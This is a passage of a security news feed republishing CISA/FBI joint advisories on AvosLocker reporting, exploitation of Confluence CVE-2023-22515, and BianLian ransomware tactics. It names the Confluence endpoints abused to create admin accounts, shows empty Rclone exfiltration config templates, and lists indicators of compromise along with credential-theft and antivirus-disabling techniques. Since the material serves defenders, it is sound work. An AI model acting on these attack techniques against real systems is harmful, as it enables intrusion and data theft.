<li><a href="https://www.cisa.gov/cyber-hygiene-services" title="https://www.cisa.gov/cyber-hygiene-services">Cyber Hygiene Services</a> and <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0" title="Ransomware Readiness Assessment CSET v10.3">Ransomware Readiness Assessment</a> provide no-cost cyber hygiene and ransomware readiness assessment services.</li>
</ul><h3><strong>REPORTING</strong></h3>
<p>The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with AvosLocker affiliates, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at <a href="https://www.ic3.gov/" title="Internet Crime Complaint Center (IC3)">ic3.gov</a>, <a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">local FBI Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center at <a href="mailto:report@cisa.gov?subject=Ransomware%20Incident" title="Report to CISA">report@cisa.gov</a> or (888) 282-0870.</p>
<h3><strong>DISCLAIMER</strong></h3>
<p>The information in this report is being provided “as is” for informational purposes only. CISA and  FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.</p>
<h3><strong>REFERENCES</strong></h3>
<p>[1] <a href="https://github.com/sysdream/ligolo" title="sysdream / ligolo">GitHub sysdream | ligolo repository</a><br>
[2] <a href="https://github.com/jpillora/chisel" title="jpillora / chisel">GitHub jpillora | chisel repository</a><br>
[3] <a href="https://github.com/BishopFox/sliver/tree/6c02971b54831884d30407b632a379947dd289ad" title="BishopFox / sliver">GitHub BishopFox | sliver repository</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks]]></title>
<description><![CDATA[SUMMARY
The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recent...]]></description>
<link>https://tsecurity.de/de/1899019/sicherheitsluecken/threat-actors-exploit-atlassian-confluence-cve-2023-22515-for-initial-access-to-networks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1899019/sicherheitsluecken/threat-actors-exploit-atlassian-confluence-cve-2023-22515-for-initial-access-to-networks/</guid>
<pubDate>Fri, 20 Oct 2023 19:47:39 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3><strong>SUMMARY</strong></h3>
<p>The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) in response to the active exploitation of CVE-2023-22515. This recently disclosed vulnerability affects certain versions of Atlassian Confluence Data Center and Server, enabling malicious cyber threat actors to obtain initial access to Confluence instances by creating unauthorized Confluence administrator accounts. Threat actors exploited CVE-2023-22515 as a zero-day to obtain access to victim systems and continue active exploitation post-patch. Atlassian has rated this vulnerability as critical; CISA, FBI, and MS-ISAC expect widespread, continued exploitation due to ease of exploitation.</p>
<p>CISA, FBI, and MS-ISAC strongly encourage network administrators to immediately apply the upgrades provided by Atlassian. CISA, FBI, and MS-ISAC also encourage organizations to hunt for malicious activity on their networks using the detection signatures and indicators of compromise (IOCs) in this CSA. If a potential compromise is detected, organizations should apply the incident response recommendations.</p>
<p>For additional information on upgrade instructions, a complete list of affected product versions, and IOCs, see Atlassian’s security advisory for CVE-2023-22515.[<a href="https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html" title="CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server">1</a>] While Atlassian’s advisory provides interim measures to temporarily mitigate known attack vectors, CISA, FBI, and MS-ISAC strongly encourage upgrading to a fixed version or taking servers offline to apply necessary updates.</p>
<p>Download the PDF version of this report:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-10/aa23-289a-threat-actors-exploit-atlassian-confluence-cve-2023-22515-for-initial-access_0.pdf" class="c-file__link" target="_blank">AA23-289A Threat Actors Exploit Atlassian Confluence CVE-2023-22515 for Initial Access to Networks</a>
    <span class="c-file__size">(PDF,       476.56 KB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs, see:</p>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-10/AA23-289A.stix_.xml" class="c-file__link" target="_blank">AA23-289A STIX XML</a>
    <span class="c-file__size">(XML,       12.45 KB
  )</span>
  </div>
</div>





<div class="c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-10/AA23-289A%20Threat%20Actors%20Exploit%20CVE-2023-22515%20for%20Initial%20Access%20to%20Networks.stix_.json" class="c-file__link" target="_blank">AA23-289A STIX JSON</a>
    <span class="c-file__size">(JSON,       9.03 KB
  )</span>
  </div>
</div>
<h3><strong>TECHNICAL DETAILS</strong></h3>
<h4><strong>Overview</strong></h4>
<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-22515" title="CVE-2023-22515">CVE-2023-22515</a> is a critical Broken Access Control vulnerability affecting the following versions of Atlassian Confluence Data Center and Server. Note: Atlassian Cloud sites (sites accessed by an atlassian.net domain), including Confluence Data Center and Server versions before 8.0.0, are not affected by this vulnerability.</p>
<table class="MsoTableGrid"><tbody><tr><td>
<ul><li>8.0.0</li>
<li>8.0.1</li>
<li>8.0.2</li>
<li>8.0.3</li>
<li>8.0.4</li>
<li>8.1.0</li>
<li>8.1.1</li>
</ul></td>
<td>
<ul><li>8.1.3</li>
<li>8.1.4</li>
<li>8.2.0</li>
<li>8.2.1</li>
<li>8.2.2</li>
<li>8.2.3</li>
<li>8.3.0</li>
</ul></td>
<td>
<ul><li>8.3.1</li>
<li>8.3.2</li>
<li>8.4.0</li>
<li>8.4.1</li>
<li>8.4.2</li>
<li>8.5.0</li>
<li>8.5.1</li>
</ul></td>
</tr></tbody></table><p>Unauthenticated remote threat actors can exploit this vulnerability to create unauthorized Confluence administrator accounts and access Confluence instances. More specifically, threat actors can change the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a request on the unauthenticated /server-info.action endpoint.</p>
<p>Considering the root cause of the vulnerability allows threat actors to modify critical configuration settings, CISA, FBI, and MS-ISAC assess that the threat actors may not be limited to creating new administrator accounts. Open source further indicates an Open Web Application Security Project (OWASP) classification of injection (i.e., <a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">CWE-20: Improper Input Validation</a>) is an appropriate description.[<a href="https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis?referrer=search" title="Rapid7 | CVE-2023-22515 Analysis">2</a>] Atlassian released a patch on October 4, 2023, and confirmed that threat actors exploited CVE-2023-22515 as a zero-day—a previously unidentified vulnerability.[<a href="https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html" title="CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server">1</a>]</p>
<p>On October 5, 2023, CISA added this vulnerability to its <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities Catalog</a> based on evidence of active exploitation. Due to the ease of exploitation, CISA, FBI, and MS-ISAC expect to see widespread exploitation of unpatched Confluence instances in government and private networks.</p>
<h4><strong>Post-Exploitation: Exfiltration of Data</strong></h4>
<p>Post-exploitation exfiltration of data can be executed through of a variety of techniques. A predominant method observed involves the use of cURL—a command line tool used to transfer data to or from a server. An additional data exfiltration technique observed includes use of Rclone [<a href="https://attack.mitre.org/versions/v13/software/S1040/" title="Rclone">S1040</a>]—a command line tool used to sync data to cloud and file hosting services such as Amazon Web Services and China-based UCloud Information Technology Limited. <strong>Note: </strong>This does not preclude the effectiveness of alternate methods, but highlights methods observed to date. Threat actors were observed using Rclone to either upload a configuration file to victim infrastructure or enter cloud storage credentials via the command line. Example configuration file templates are listed in the following Figures 1 and 2, which are populated with the credentials of the exfiltration point:</p>
<table><tbody><tr><td><code>[s3]<br>
			type =<br>
			env_auth =<br>
			access_key_id =<br>
			secret_access_key =<br>
			region = <br>
			endpoint =  <br>
			location_constraint =<br>
			acl =<br>
			server_side_encryption =<br>
			storage_class =</code></td>
</tr></tbody></table><table><tbody><tr><td><code>[minio]<br>
			type =<br>
			provider =<br>
			env_auth =<br>
			access_key_id =<br>
			secret_access_key =<br>
			endpoint =<br>
			acl =</code></td>
</tr></tbody></table><p>The following User-Agent strings were observed in request headers. <strong>Note:</strong> As additional threat actors begin to use this CVE due to the availability of publicly posted proof-of-concept code, an increasing variation in User-Agent strings is expected:</p>
<ul><li><code>Python-requests/2.27.1</code></li>
<li><code>curl/7.88.1</code></li>
</ul><h3><strong>Indicators of Compromise</strong></h3>
<p><strong>Disclaimer:</strong> Organizations are recommended to investigate or vet these IP addresses prior to taking action, such as blocking.</p>
<p>The following IP addresses were obtained from FBI investigations as of October 2023 and observed conducting data exfiltration:</p>
<ul><li><code>170.106.106[.]16</code></li>
<li><code>43.130.1[.]222</code></li>
<li><code>152.32.207[.]23</code></li>
<li><code>199.19.110[.]14</code></li>
<li><code>95.217.6[.]16</code> (<strong>Note: </strong>This is the official rclone.org website)</li>
</ul><p>Additional IP addresses observed sending related exploit traffic have been shared by Microsoft.[<a href="https://twitter.com/MsftSecIntel/status/1711871733932671336" title="Microsoft Threat Intelligence | @MsftSecIntel">3</a>]</p>
<h3><strong>DETECTION METHODS</strong></h3>
<p>Network defenders are encouraged to review and deploy Proofpoint’s Emerging Threat signatures. See Ruleset Update Summary - 2023/10/12 - v10438.[<a href="https://community.emergingthreats.net/c/ruleset-updates/9" title="Community | Emerging Threats">4</a>]</p>
<p>Network defenders are also encouraged to aggregate application and server-level logging from Confluence servers to a logically separated log search and alerting system, as well as configure alerts for signs of exploitation (as detailed in Atlassian’s security advisory).</p>
<h3>INCIDENT RESPONSE</h3>
<p>Organizations are encouraged to review all affected Confluence instances for evidence of compromise, as outlined by Atlassian.[<a href="https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html" title="CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server">1</a>] If compromise is suspected or detected, organizations should assume that threat actors hold full administrative access and can perform any number of unfettered actions—these include but are not limited to exfiltration of content and system credentials, as well as installation of malicious plugins.</p>
<p>If a potential compromise is detected, organizations should:</p>
<ol><li>Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
<ul><li><strong>Note:</strong> Upgrading to fixed versions, as well as removing malicious administrator accounts may not fully mitigate risk considering threat actors may have established additional persistence mechanisms.</li>
<li>Search and audit logs from Confluence servers for attempted exploitation.[<a href="https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis?referrer=search">2</a>]</li>
</ul></li>
<li>Quarantine and take offline potentially affected hosts.</li>
<li>Provision new account credentials.</li>
<li>Reimage compromised hosts.</li>
<li>Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). The FBI encourages recipients of this document to report information concerning suspicious or criminal activity to their local FBI field office or IC3.gov. State, local, tribal, and territorial governments should report incidents to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).</li>
</ol><h3><strong>MITIGATIONS</strong></h3>
<p>These mitigations apply to all organizations using non-cloud Atlassian Confluence Data Center and Server software. CISA, FBI, and MS-ISAC recommend that software manufacturers incorporate secure by design and default principles and tactics into their software development practices to reduce the prevalence of Broken Access Control vulnerabilities, thus strengthening the secure posture for their customers.</p>
<p>For more information on secure by design, see CISA’s <a href="https://www.cisa.gov/securebydesign" title="Secure by Design">Secure by Design and Default</a> webpage and <a href="https://www.cisa.gov/resources-tools/resources/secure-by-design-and-default" title="Security-by-Design and -Default">joint guide</a>.</p>
<p>As of October 10, 2023, proof-of-concept exploits for CVE-2023-22515 have been observed in open source publications.[<a href="https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2023-22515" title="vulhub / vulhub">5</a>] While there are immediate concerns such as increased risk of exploitation and the potential integration into malware toolkits, the availability of a proof-of-concept presents an array of security and operational challenges that extend beyond these immediate issues. Immediate action is strongly advised to address the potential risks associated with this development.</p>
<p>CISA, FBI, and MS-ISAC recommend taking immediate action to address the potential associated risks and encourage organizations to:</p>
<ul><li><strong>Immediately upgrade to fixed versions. </strong>See Atlassian’s upgrading instructions[<a href="https://confluence.atlassian.com/doc/upgrading-confluence-4578.html" title="Confluence Support | Upgrading Confluence">6</a>] for more information. If unable to immediately apply upgrades,<strong> restrict untrusted network access until feasible</strong>. Malicious cyber threat actors who exploit the affected instance can escalate to administrative privileges.</li>
<li><strong>Follow best cybersecurity practices in your production and enterprise environments.</strong> While not observed in this instance of exploitation, mandating <a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">phishing-resistant multifactor authentication (MFA)</a> for all staff and services can make it more difficult for threat actors to gain access to networks and information systems. For additional best practices, see:
<ul><li><strong>CISA’s </strong><a href="https://www.cisa.gov/cpg" title="Cross-Sector Cybersecurity Performance Goals"><strong>Cross-Sector Cybersecurity Performance Goals</strong></a><strong> (CPGs).</strong> The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures (TTPs). Because the CPGs are a subset of best practices, CISA recommends software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).</li>
<li><strong>Center for Internet Security’s (CIS) </strong><a href="https://www.cisecurity.org/controls" title="Center for Internet Security | Critical Security Controls"><strong>Critical Security Controls</strong></a><strong>. </strong>The CIS Critical Security Controls are a prescriptive, prioritized, and simplified set of best practices that organizations can use to strengthen cybersecurity posture and protect against cyber incidents.</li>
</ul></li>
</ul><h3>RESOURCES</h3>
<ul><li><a href="https://nvd.nist.gov/vuln/detail/CVE-2023-22515" title="CVE-2023-22515">NIST: CVE-2023-22515</a></li>
<li><a href="https://cwe.mitre.org/data/definitions/20.html" title="CWE-20: Improper Input Validation">MITRE: CWE-20 - Improper Input Validation</a></li>
<li><a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">CISA: Known Exploited Vulnerabilities Catalog</a></li>
<li><a href="https://attack.mitre.org/versions/v13/software/S1040/" title="Rclone">MITRE Software: Rclone</a></li>
<li><a href="https://www.cisa.gov/securebydesign" title="Secure by Design">CISA: Secure by Design and Default</a></li>
<li><a href="https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf" title="Implementing Phishing-Resistant MFA">CISA: Phishing-Resistant MFA</a></li>
<li><a href="https://www.cisa.gov/cpg" title="Cross-Sector Cybersecurity Performance Goals">CISA: Cross-Sector Cybersecurity Performance Goals</a></li>
<li><a href="https://www.cisecurity.org/controls" title="Center for Internet Security | Critical Security Controls">CIS: Critical Security Controls</a></li>
</ul><h3>REFERENCES</h3>
<p>[1]   <a href="https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html" title="CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server">Atlassian: CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server</a><br>
[2]   <a href="https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis?referrer=search" title="Rapid7 | CVE-2023-22515 Analysis">Rapid7: CVE-2023-22515 Analysis</a><br>
[3]   <a href="https://twitter.com/MsftSecIntel/status/1711871733932671336" title="Microsoft Threat Intelligence | @MsftSecIntel">Microsoft: CVE-2023-22515 Exploit IP Addresses</a><br>
[4]   <a href="https://community.emergingthreats.net/c/ruleset-updates/9" title="Community | Emerging Threats">Proofpoint: Emerging Threats Rulesets</a><br>
[5]   <a href="https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2023-22515" title="vulhub / vulhub">Confluence CVE-2023-22515 Proof of Concept - vulhub</a><br>
[6]  <a href="https://confluence.atlassian.com/doc/upgrading-confluence-4578.html" title="Confluence Support | Upgrading Confluence"> Atlassian Support: Upgrading Confluence</a></p>
<h3><strong>DISCLAIMER</strong></h3>
<p>The information in this report is being provided “as is” for informational purposes only. CISA, FBI, and MS-ISAC do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA, FBI, and MS-ISAC.</p>
<h3><strong>VERSION HISTORY</strong></h3>
<p>October 16, 2023: Initial version.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[#StopRansomware: BianLian Ransomware Group]]></title>
<description><![CDATA[Summary
Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics,...]]></description>
<link>https://tsecurity.de/de/1890440/sicherheitsluecken/stopransomware-bianlian-ransomware-group/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1890440/sicherheitsluecken/stopransomware-bianlian-ransomware-group/</guid>
<pubDate>Wed, 24 May 2023 10:32:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Summary</h3>
<p><em>Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and learn more about other ransomware threats and no-cost resources.</em></p>
<p>The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Cyber Security Centre (ACSC) are releasing this joint Cybersecurity Advisory to disseminate known BianLian ransomware and data extortion group IOCs and TTPs identified through FBI and ACSC investigations as of March 2023.</p>
<table><tbody><tr><td>
<div>
<p><strong>Actions to take today to mitigate cyber threats from BianLian ransomware and data extortion: </strong><br>
			• Strictly limit the use of RDP and other remote desktop services.<br>
			• Disable command-line and scripting activities and permissions.<br>
			• Restrict usage of PowerShell and update Windows PowerShell or PowerShell Core to the latest version.</p>
</div>
</td>
</tr></tbody></table><p>BianLian is a ransomware developer, deployer, and data extortion cybercriminal group that has targeted organizations in multiple U.S. critical infrastructure sectors since June 2022. They have also targeted Australian critical infrastructure sectors in addition to professional services and property development. The group gains access to victim systems through valid Remote Desktop Protocol (RDP) credentials, uses open-source tools and command-line scripting for discovery and credential harvesting, and exfiltrates victim data via File Transfer Protocol (FTP), Rclone, or Mega. BianLian group actors then extort money by threatening to release data if payment is not made. BianLian group originally employed a double-extortion model in which they encrypted victims’ systems after exfiltrating the data; however, around January 2023, they shifted to primarily exfiltration-based extortion.</p>
<p>FBI, CISA, and ACSC encourage critical infrastructure organizations and small- and medium-sized organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of BianLian and other ransomware incidents.</p>
<p>Download the PDF version of this report (710kb):</p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-05/aa23-136a_stopransomware_bianlian_ransomware_group_1.pdf" class="c-file__link" target="_blank">AA23-136A_StopRansomware_BianLian_Ransomware_Group.pdf</a>
    <span class="c-file__size">(PDF,       644.23 KB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs (35kb), see:</p>



<div class="align-center c-file">
    <div class="c-file__download">
    <a href="https://www.cisa.gov/sites/default/files/2023-05/aa23-136a.stix_.xml" class="c-file__link" target="_blank">AA23-136A.STIX_.xml</a>
    <span class="c-file__size">(XML,       34.72 KB
  )</span>
  </div>
</div>
<p>For a downloadable copy of IOCs in JSON format, see <a href="https://www.cisa.gov/sites/default/files/STIX/AA23-136A_StopRansomware_BianLian_Ransomware_Group" title="JSON file for AA23-136A">AA23-136A.stix.json</a></p>
<h3>Technical Details</h3>
<p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v13/matrices/enterprise/">MITRE ATT&amp;CK<sup>®</sup> for Enterprise</a> framework, version 13. See the MITRE ATT&amp;CK® Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK® Tactics and Techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&amp;CK framework, see CISA and MITRE ATT&amp;CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping">Best Practices for MITRE ATT&amp;CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/">Decider Tool</a>.</p>
<p>BianLian is a ransomware developer, deployer, and data extortion cybercriminal group. FBI observed BianLian group targeting organizations in multiple U.S. critical infrastructure sectors since June 2022. In Australia, ACSC has observed BianLian group predominately targeting private enterprises, including one critical infrastructure organization. BianLian group originally employed a double-extortion model in which they exfiltrated financial, client, business, technical, and personal files for leverage and encrypted victims’ systems. In 2023, FBI observed BianLian shift to primarily exfiltration-based extortion with victims’ systems left intact, and ACSC observed BianLian shift exclusively to exfiltration-based extortion. BianLian actors warn of financial, business, and legal ramifications if payment is not made.</p>
<h4>Initial Access</h4>
<p>BianLian group actors gain initial access to networks by leveraging compromised Remote Desktop Protocol (RDP) credentials likely acquired from initial access brokers [<a href="https://attack.mitre.org/versions/v13/techniques/T1078/">T1078</a>],[<a href="https://attack.mitre.org/versions/v13/techniques/T1133/">T1133</a>] or via phishing [<a href="https://attack.mitre.org/versions/v13/techniques/T1566">T1566</a>].</p>
<h4>Command and Control</h4>
<p>BianLian group actors implant a custom backdoor specific to each victim written in Go (see the <a href="https://www.cisa.gov/#_Indicators_of_Compromise">Indicators of Compromise</a> Section for an example) [<a href="https://attack.mitre.org/versions/v13/techniques/T1587/001/">T1587.001</a>] and install remote management and access software—e.g., TeamViewer, Atera Agent, SplashTop, AnyDesk—for persistence and command and control [<a href="https://attack.mitre.org/versions/v13/techniques/T1105/">T1105</a>],[<a href="https://attack.mitre.org/versions/v13/techniques/T1219/">T1219</a>].</p>
<p>FBI also observed BianLian group actors create and/or activate local administrator accounts [<a href="https://attack.mitre.org/versions/v13/techniques/T1136/001">T1136.001</a>] and change those account passwords [<a href="https://attack.mitre.org/versions/v13/techniques/T1098/">T1098</a>].</p>
<h4>Defense Evasion</h4>
<p>BianLian group actors use PowerShell [<a href="https://attack.mitre.org/versions/v13/techniques/T1059/001/">T1059.001</a>] and Windows Command Shell [<a href="https://attack.mitre.org/versions/v13/techniques/T1059/003/">T1059.003</a>] to disable antivirus tools [<a href="https://attack.mitre.org/versions/v13/techniques/T1562/001/">T1562.001</a><u>]</u>, specifically Windows defender and Anti-Malware Scan Interface (AMSI). BianLian actors modify the Windows Registry [<a href="https://attack.mitre.org/versions/v13/techniques/T1112">T1112</a>] to disable tamper protection for Sophos SAVEnabled, SEDEenabled, and SAVService services, which enables them to uninstall these services. See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information, including specific commands they have used.</p>
<h4>Discovery</h4>
<p>BianLian group actors use a combination of compiled tools, which they first download to the victim environment, to learn about the victim’s environment. BianLian group actors have used:</p>
<ul><li>Advanced Port Scanner, a network scanner used to find open ports on network computers and retrieve versions of programs running on the detected ports [<a href="https://attack.mitre.org/versions/v13/techniques/T1046/">T1046</a>].</li>
<li>SoftPerfect Network Scanner (<a>netscan.exe</a>), a network scanner that can ping computers, scan ports, and discover shared folders [<a href="https://attack.mitre.org/versions/v13/techniques/T1135/">T1135</a><u>]</u>.</li>
<li>SharpShares to enumerate accessible network shares in a domain.</li>
<li>PingCastle to enumerate Active Directory (AD) [<a href="https://attack.mitre.org/versions/v13/techniques/T1482/">T1482</a>]. PingCastle provides an AD map to visualize the hierarchy of trust relationships.</li>
</ul><p>BianLian actors also use native Windows tools and Windows Command Shell to:</p>
<ul><li>Query currently logged-in users [<a href="https://attack.mitre.org/versions/v13/techniques/T1033/">T1033</a>].</li>
<li>Query the domain controller to identify:
<ul><li>All groups [<a href="https://attack.mitre.org/versions/v13/techniques/T1069/002/">T1069.002</a>].</li>
<li>Accounts in the <a>Domain Admins</a> and <a>Domain Computers </a>groups [<a href="https://attack.mitre.org/versions/v13/techniques/T1087/002/">1087.002</a>].</li>
<li>All users in the domain.</li>
</ul></li>
<li>Retrieve a list of all domain controllers and domain trusts.</li>
<li>Identify accessible devices on the network [<a href="https://attack.mitre.org/versions/v13/techniques/T1018/">T1018</a>].</li>
</ul><p>See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information, including specific commands they have used.</p>
<h4>Credential Access</h4>
<p>BianLian group uses valid accounts for lateral movement through the network and to pursue other follow-on activity. To obtain the credentials, BianLian group actors use Windows Command Shell to find unsecured credentials on the local machine [<a href="https://attack.mitre.org/versions/v13/techniques/T1552/001/">T1552.001</a>]. FBI also observed BianLian harvest credentials from the Local Security Authority Subsystem Service (LSASS) memory [<a href="https://attack.mitre.org/versions/v13/techniques/T1003/001/">T1003.001</a>], download RDP Recognizer (a tool that could be used to brute force RDP passwords or check for RDP vulnerabilities) to the victim system, and attempt to access an Active Directory domain database (<a>NTDS.dit</a>) [<a href="https://attack.mitre.org/versions/v13/techniques/T1003/003/">T1003.003</a>].</p>
<p>In one case, FBI observed BianLian actors use a portable executable version of an <a href="https://attack.mitre.org/versions/v11/software/S0357/">Impacket</a> tool (<a>secretsdump.py</a>) to move laterally to a domain controller and harvest credential hashes from it.<strong> Note:</strong> Impacket is a Python toolkit for programmatically constructing and manipulating network protocols. Through the Command Shell, an Impacket user with credentials can run commands on a remote device using the Windows management protocols required to support an enterprise network. Threat actors can run portable executable files on victim systems using local user rights, assuming the executable is not blocked by an application allowlist or antivirus solution.</p>
<p>See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information.</p>
<h4>Persistence and Lateral Movement</h4>
<p>BianLian group actors use PsExec and RDP with valid accounts for lateral movement [<a href="https://attack.mitre.org/versions/v13/techniques/T1021/001/">T1021.001</a>]. Prior to using RDP, BianLian actors used Command Shell and native Windows tools to add user accounts to the local <a>Remote Desktop Users</a> group, modified the added account’s password, and modified Windows firewall rules to allow incoming RDP traffic [<a href="https://attack.mitre.org/versions/v13/techniques/T1562/004/">T1562.004</a>]. See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a> for additional information.</p>
<p>In one case, FBI found a forensic artifact (<a>exp.exe</a>) on a compromised system that likely exploits the Netlogon vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472">CVE-2020-1472</a>) and connects to a domain controller.</p>
<h4>Collection</h4>
<p>FBI observed BianLian group actors using malware (<a>system.exe</a>) that enumerates registry [<a href="https://attack.mitre.org/versions/v13/techniques/T1012/">T1012</a>] and files [<a href="https://attack.mitre.org/versions/v13/techniques/T1083/">T1083</a>] and copies clipboard data from users [<a href="https://attack.mitre.org/versions/v13/techniques/T1115/">T1115</a>].</p>
<h4>Exfiltration and Impact</h4>
<p>BianLian group actors search for sensitive files using PowerShell scripts (See <a href="https://www.cisa.gov/#_APPENDIX_:_">Appendix: Windows PowerShell and Command Shell Activity</a>) and exfiltrate them for data extortion. Prior to January 2023, BianLian actors encrypted files [<a href="https://attack.mitre.org/versions/v13/techniques/T1486/">T1486</a>] after exfiltration for double extortion.</p>
<p>BianLian group uses File Transfer Protocol (FTP) [<a href="https://attack.mitre.org/versions/v13/techniques/T1048/">T1048</a>] and <a href="https://attack.mitre.org/versions/v13/software/S1040/">Rclone</a>, a tool used to sync files to cloud storage, to exfiltrate data [<a href="https://attack.mitre.org/versions/v13/techniques/T1537/">T1537</a>]. FBI observed BianLian group actors install Rclone and other files in generic and typically unchecked folders such as <a>programdata\vmware</a> and music folders. ACSC observed BianLian group actors use Mega file-sharing service to exfiltrate victim data [<a href="https://attack.mitre.org/versions/v13/techniques/T1567/002/">T1567.002</a>].</p>
<p>BianLian’s encryptor (<a>encryptor.exe</a>) modified all encrypted files to have the <a>.bianlian</a> extension. The encryptor created a ransom note, <a>Look at this instruction.txt</a>, in each affected directory (see Figure 1 for an example ransom note.) According to the ransom note, BianLian group specifically looked for, encrypted, and exfiltrated financial, client, business, technical, and personal files.</p>
<table class="MsoTableGrid"><tbody><tr><td>



<figure class="c-figure c-figure--image u-align-center" role="group"><div class="c-figure__media">    <img loading="lazy" src="https://www.cisa.gov/sites/default/files/styles/large/public/2023-05/figure_1_-_bianlian_sample_ransom_note.jpg?itok=UJrhqIIN" width="666" height="393" alt="Screenshot of sample text"></div>
      <figcaption class="c-figure__caption"><em>Figure 1: BianLian Sample Ransom Note (Look at this instruction.txt)</em></figcaption></figure></td>
